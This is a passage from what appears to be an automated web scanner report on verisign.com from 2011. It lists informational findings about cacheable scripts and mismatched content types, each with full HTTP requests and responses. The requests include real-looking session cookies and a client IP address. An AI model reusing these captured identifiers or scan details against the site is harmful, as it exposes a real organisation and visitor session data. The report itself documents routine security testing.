GET /authweb/global/assets/header/js/header.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:18 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:25:18 GMT Content-Length: 1558Content-Type: text/html /******************************************* ** Header functions ** *******************************************/ //----------------------------------------// //Load Defaults when DOM i...[SNIP]...
22.51. http://www.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/authweb/global/assets/header/js/jquery.autocomplete.js
Request
GET /authweb/global/assets/header/js/jquery.autocomplete.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:19 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:25:19 GMTContent-Type: text/html Content-Length: 22148 /* * jQuery Autocomplete plugin 1.1 * * Copyright (c) 2009 J..rn Zaefferer * * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org/licenses/mit-license.php * ht...[SNIP]...
22.52. http://www.verisign.com/authweb/global/assets/shared/images/favicon.ico
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/authweb/global/assets/shared/images/favicon.ico
Request
GET /authweb/global/assets/shared/images/favicon.ico HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621614|session#1315621455064-973488#1315623414|PC#1315621455064-973488.19#1378693554; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache Last-Modified: Wed, 19 Jan 2011 20:24:14 GMT Accept-Ranges: bytes Content-Length: 1150 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:26:10 GMTContent-Type: text/html ............ .h.......(....... ..... .....@......................................>...........................................................q...................................9.........................[SNIP]...
22.53. http://www.verisign.com/authweb/global/assets/shared/js/globals.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/authweb/global/assets/shared/js/globals.js
Request
GET /authweb/global/assets/shared/js/globals.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:17 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:25:17 GMT Content-Length: 3608Content-Type: text/html /******************************************* ** Utility functions ** *******************************************/ function linkPopUp(url) { popupWin = window.open...[SNIP]...
22.54. http://www.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/authweb/global/assets/shared/js/jquery.boxshadow.js
Request
GET /authweb/global/assets/shared/js/jquery.boxshadow.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:17 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:25:17 GMT Content-Length: 1538Content-Type: text/html /* ** * jquery-boxshadow.js * * $(object).boxshadow({ * hOffset : 3, * vOffset : 3, * shadowblur : 3, * color : '#808080' * }) * * If you are using this with IE, you should s...[SNIP]...
22.55. http://www.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/authweb/global/assets/shared/js/jquery.cacheimage.js
Request
GET /authweb/global/assets/shared/js/jquery.cacheimage.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:17 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:25:17 GMT Content-Length: 1356Content-Type: text/html /* * cacheImage: a jQuery plugin * * cacheImage is a simple jQuery plugin for pre-caching images. The * plugin can be used to eliminate flashes of unstyled content (FOUC) and * improve perceived...[SNIP]...
22.56. http://www.verisign.com/authweb/global/assets/shared/js/jquery.fancybox-1.3.4.pack.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/authweb/global/assets/shared/js/jquery.fancybox-1.3.4.pack.js
Request
GET /authweb/global/assets/shared/js/jquery.fancybox-1.3.4.pack.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/code-signing/index.html?tid=a_box User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:08 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:27:08 GMTContent-Type: text/html Content-Length: 15622 /* * FancyBox - jQuery Plugin * Simple and fancy lightbox alternative * * Examples and documentation at: http://fancybox.net * * Copyright (c) 2008 - 2010 Janis Skarnelis * That said, it is har...[SNIP]...
22.57. http://www.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/authweb/global/assets/shared/js/jquery.hover_intent.js
Request
GET /authweb/global/assets/shared/js/jquery.hover_intent.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:17 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:25:17 GMT Content-Length: 1614Content-Type: text/html /** * hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+ * <http://cherne.net/brian/resources/jquery.hoverIntent.html> * * @param f onMouseOver function || An object with configuration options * @p...[SNIP]...
22.58. http://www.verisign.com/authweb/global/assets/shared/js/jquery.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/authweb/global/assets/shared/js/jquery.js
Request
GET /authweb/global/assets/shared/js/jquery.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:16 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:25:16 GMTContent-Type: text/html Content-Length: 78803 /*! * jQuery JavaScript Library v1.4.4 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Incl...[SNIP]...
22.59. http://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/authweb/global/assets/shared/js/rotator.custom.js
Request
GET /authweb/global/assets/shared/js/rotator.custom.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ssl/buy-ssl-certificates/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:59:43 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:59:43 GMT Content-Length: 985Content-Type: text/html $(document).ready (function(){ bannerFadeIn = 0; bannerFadeOut = 0; $("#prevnext a.prev").click(function(e){ var currIndex = $("#banner-controls a").index($("#banner-controls a.selected")) + ...[SNIP]...
22.60. http://www.verisign.com/authweb/global/assets/shared/js/rotator.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/authweb/global/assets/shared/js/rotator.js
Request
GET /authweb/global/assets/shared/js/rotator.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ssl/buy-ssl-certificates/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:59:43 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:59:43 GMT Content-Length: 4102Content-Type: text/html var activeBannerId = ""; var activeBannerControllerId = ""; var activeTipId = ""; var rotate = true; var myBannerNumber = 1; var activeBannerNumber = myBannerNumber; var bannerItemsLength = $(...[SNIP]...
22.61. https://www.verisign.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.verisign.com
Path:
/
Request
GET / HTTP/1.1 Host: www.verisign.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:30:44 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:30:44 GMT Keep-Alive: timeout=5, max=100 Connection: Keep-AliveContent-Type: text/html Content-Length: 34637 <!DOCTYPE html> <html lang=""> <head> <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea...[SNIP]...
22.62. https://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.verisign.com
Path:
/authweb/global/assets/shared/js/rotator.custom.js
Request
GET /authweb/global/assets/shared/js/rotator.custom.js HTTP/1.1 Host: www.verisign.com Connection: keep-alive Referer: https://www.verisign.com/products-services/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:48 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:27:48 GMT Content-Length: 985 Keep-Alive: timeout=5, max=100 Connection: Keep-AliveContent-Type: text/html $(document).ready (function(){ bannerFadeIn = 0; bannerFadeOut = 0; $("#prevnext a.prev").click(function(e){ var currIndex = $("#banner-controls a").index($("#banner-controls a.selected")) + ...[SNIP]...
22.63. https://www.verisign.com/authweb/global/assets/shared/js/rotator.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.verisign.com
Path:
/authweb/global/assets/shared/js/rotator.js
Request
GET /authweb/global/assets/shared/js/rotator.js HTTP/1.1 Host: www.verisign.com Connection: keep-alive Referer: https://www.verisign.com/products-services/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:48 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:27:48 GMT Content-Length: 4102 Keep-Alive: timeout=5, max=100 Connection: Keep-AliveContent-Type: text/html var activeBannerId = ""; var activeBannerControllerId = ""; var activeTipId = ""; var rotate = true; var myBannerNumber = 1; var activeBannerNumber = myBannerNumber; var bannerItemsLength = $(...[SNIP]...
23. Content type incorrectly stated
previous
next
There are 64 instances of this issue:
Issue background
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities. In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
23.1. http://ak.c.ooyala.com/w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG/CG0C0Y8fUuCDotziFhxJgLZO7aYuQRy7
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://ak.c.ooyala.com
Path:
/w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG/CG0C0Y8fUuCDotziFhxJgLZO7aYuQRy7
Issue detail
The response contains the following Content-type statement:The response states that it contains plain text . However, it actually appears to contain unrecognised content .
Request
GET /w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG/CG0C0Y8fUuCDotziFhxJgLZO7aYuQRy7 HTTP/1.1 Host: ak.c.ooyala.com Proxy-Connection: keep-alive Referer: http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819
Response
HTTP/1.1 200 OK x-amz-id-2: 2C0Xja9JcWvdZkdFgY46HvgLzrDh3/uV5ZIHpKbfgaV7B82NKulzZhMLCgKLiUEC x-amz-request-id: 2C289606F85CA6E8 Last-Modified: Wed, 24 Mar 2010 20:46:05 GMT ETag: "e296438fa374f5ed59656563980763eb" Accept-Ranges: bytesContent-Type: text/plain Content-Length: 285 Server: AmazonS3 Cache-Control: max-age=604800 Date: Fri, 09 Sep 2011 21:26:10 GMT Connection: close x...=O.0.....[\.s.. ;U.. .e....m.qZ.(...&B ....{w.=.pf..K...)....b@\.._......n..83.m..?X......[......-..n....L.w>..|R.u9}......2......k.#9Z....,p..]..b.B~J.. ...`.....+.$....)..M^6.Ht....L/.D~ ....o.....[SNIP]...
23.2. http://cdn.verisign.com/assets/fonts/samd____-webfont.woff
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://cdn.verisign.com
Path:
/assets/fonts/samd____-webfont.woff
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain unrecognised content .
Request
GET /assets/fonts/samd____-webfont.woff HTTP/1.1 Host: cdn.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/code-signing/index.html?tid=a_box User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719
Response
HTTP/1.1 200 OK Server: Apache ETag: "2ef819b-7544-4a59eedb01b80" Accept-Ranges: bytesContent-Type: text/html Age: 3152 Date: Fri, 09 Sep 2011 21:27:10 GMT Last-Modified: Mon, 13 Jun 2011 21:51:58 GMT Expires: Sun, 09 Oct 2011 13:52:54 GMT Content-Length: 30020 Connection: keep-alive wOFF......uD................................FFTM............\...GDEF........... ....GPOS..........7&[0{.GSUB.......,...0....OS/2.......R...`x..fcmap...D...r....y0..cvt .......2...2 o..fpgm...........e...[SNIP]...
23.3. http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://cdn.verisign.com
Path:
/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg
Issue detail
The response contains the following Content-type statement:The response states that it contains a JPEG image . However, it actually appears to contain a GIF image .
Request
GET /authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg HTTP/1.1 Host: cdn.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Server: Apache ETag: "29304a9-3c47-49d8465fa77c0" Accept-Ranges: bytesContent-Type: image/jpeg Age: 27502 Date: Fri, 09 Sep 2011 21:25:05 GMT Last-Modified: Wed, 02 Mar 2011 18:51:19 GMT Expires: Sun, 09 Oct 2011 13:46:43 GMT Content-Length: 15431 Connection: keep-alive GIF89a..............Os.............l.qqr.......-...........Yg......"?|NP......................$H..............................NQe.N+.....u.q..........3ny..4^..........<{...............Z:&1......?f.......[SNIP]...
23.4. http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://cdn.verisign.com
Path:
/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg
Issue detail
The response contains the following Content-type statement:The response states that it contains a JPEG image . However, it actually appears to contain a GIF image .
Request
